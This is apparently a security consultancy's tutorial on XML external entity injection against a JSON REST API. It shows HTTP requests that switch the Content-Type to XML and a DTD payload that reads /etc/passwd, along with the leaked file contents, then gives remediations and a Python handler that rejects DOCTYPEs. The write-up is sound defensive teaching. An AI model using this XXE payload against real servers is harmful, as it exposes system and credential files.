How are JSON REST APIs prone to XML external entity injection?

As we know, REST and SOAP are the two technologies responsible for carrying data between client and server in web services. Depending on the requirement, the server parses or converts the requested data into its own format before processing the request further. Developers implement either a REST API or a SOAP service depending on the requirement; the two are quite different in nature but perform the same responsibility.

How is it possible, and what happens?

It is only possible when the server allows, or fails to restrict, the parsing capabilities: for example, when JSON data is replaced by XML data carrying a DTD and the server either lets the parser handle it or is incapable of restricting the conversion to the XML format, the endpoint may be vulnerable to XXE, and sensitive data such as the server's password file or sensitive configuration files may be exposed. This happens because the server implements proper prevention for JSON requests but fails to handle XML request data carrying a DTD, which in turn makes it prone to XXE attacks.

Basic JSON Request:

Take as an example an application (testing.example.com) that supports JSON for web service calls handling a search for the details of a requested username.

  • HTTP Request: Requested traffic in JSON format.

POST /findname HTTP/1.1
Host: testing.example.com
Accept: application/json
Content-Type: application/json
Content-Length: 38

{"search":"name","value":"TCS"}

  • HTTP Response: Throws an error, as no data was found for the requested parameter:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43

{"error": "no search found for TCS"}

Attack Scenario:

1. First change the Content-Type header of the REST API request to an XML media type, leaving the JSON body unchanged.

HTTP Request:

POST /findname HTTP/1.1
Host: testing.example.com
Accept: application/json
Content-Type: application/xml
Content-Length: 38

{"search":"name","value":"TCS"}

HTTP Response:

In this response we observe that the server supports the XML format, but the body of the request contained JSON. Because of the mismatch between the declared format and the body, the server throws a 500 Internal Server Error. Note that the error message itself discloses the parser handling the body (org.xml.sax.SAXParseException, a Java SAX parser).

HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Content-Length: 127

{"errors":{"errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity."}}

2. The request now carries the same parameters in XML format with a DTD, instead of JSON.

HTTP Request:

POST /findname HTTP/1.1
Host: testing.example.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE testrest [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 2467

{"error": " no search found for root:x:0:0:root:/root:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
tc:x:1001:50:Linux%20User,,,:/home/tc:/bin/sh
play:x:100:65534:Linux%20User,,,:/opt/play-2.1.3/xxe/:/bin/false
mysql:x:101:65534:Linux%20User,,,:/home/mysql:/bin/false…}

Remediation:

  1. The server must restrict requests to the data type the REST API is designed for (here JSON) and reject other Content-Type values.
  2. When the server does parse another data format, it must validate the document while parsing and must not resolve external resources.
  3. Disallow the DOCTYPE declaration, and restrict the application's access to sensitive files.
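The following is an added example, not code from the original article or from the application it describes. It shows remediations 1 and 3 in a small Python request handler: only the JSON media type the endpoint was built for is accepted, and if XML parsing is ever enabled, the parser (the standard-library expat module) aborts on any DOCTYPE or entity declaration before an entity could be resolved. The function names and the three sample bodies are constructed for the example; the search/value field names come from the article's traffic.

```python
import json
import xml.parsers.expat as expat

# Constructed sample request bodies, mirroring the article's traffic (not real captures).
JSON_BODY = b'{"search":"name","value":"TCS"}'
DTD_XML_BODY = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<!DOCTYPE testrest [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>\n'
    b'<root><search>name</search><value>&xxe;</value></root>'
)
PLAIN_XML_BODY = b'<root><search>name</search><value>TCS</value></root>'


class RejectedRequest(Exception):
    """Raised when a request must be refused before any data reaches the backend."""


def media_type_of(content_type):
    """Strip parameters: 'application/xml; charset=utf-8' -> 'application/xml'."""
    return content_type.split(";", 1)[0].strip().lower()


def parse_search_request(content_type, body, allow_xml=False):
    """Remediation 1: accept only the content type the API is designed for.
    XML is parsed only when explicitly enabled, and then only without a DTD."""
    media_type = media_type_of(content_type)
    if media_type == "application/json":
        doc = json.loads(body)
        return {"search": doc["search"], "value": doc["value"]}
    if allow_xml and media_type in ("application/xml", "text/xml"):
        return parse_xml_without_dtd(body)
    raise RejectedRequest("unsupported Content-Type: %s" % media_type)


def parse_xml_without_dtd(body):
    """Remediation 3: refuse any DOCTYPE (so no entity can be declared) and
    refuse external entity references as defence in depth."""
    fields, current, buf = {}, None, []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise RejectedRequest("DOCTYPE declarations are not accepted")

    def entity_decl(*args):
        raise RejectedRequest("entity declarations are not accepted")

    def external_entity_ref(context, base, system_id, public_id):
        return 0  # tells expat to abort instead of fetching the resource

    def start_element(name, attrs):
        nonlocal current
        current = name
        del buf[:]

    def char_data(data):
        if current is not None:
            buf.append(data)

    def end_element(name):
        nonlocal current
        if name in ("search", "value"):
            fields[name] = "".join(buf)
        current = None

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = char_data
    parser.EndElementHandler = end_element
    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:
        # Malformed XML (e.g. a JSON body sent as application/xml) is a client
        # error, not a 500, and the parser's own message is not echoed back.
        raise RejectedRequest("malformed XML request body") from exc
    return fields


def request_outcome(content_type, body, allow_xml=False):
    """Convenience wrapper: ('ok', fields) or ('rejected', reason)."""
    try:
        return ("ok", parse_search_request(content_type, body, allow_xml))
    except RejectedRequest as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    print(request_outcome("application/json", JSON_BODY))
    print(request_outcome("application/xml", JSON_BODY))            # step 1 of the scenario
    print(request_outcome("application/xml", DTD_XML_BODY, True))   # step 2 of the scenario
    print(request_outcome("application/xml", PLAIN_XML_BODY, True))
```

With `allow_xml` left at its default the endpoint never reaches an XML parser at all, which is the cheapest fix for an API that only ever intended to speak JSON; the DOCTYPE handler matters for the case where XML support is a genuine requirement.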

Authored By - Saurav Samanta
TCS Cyber Security Practice
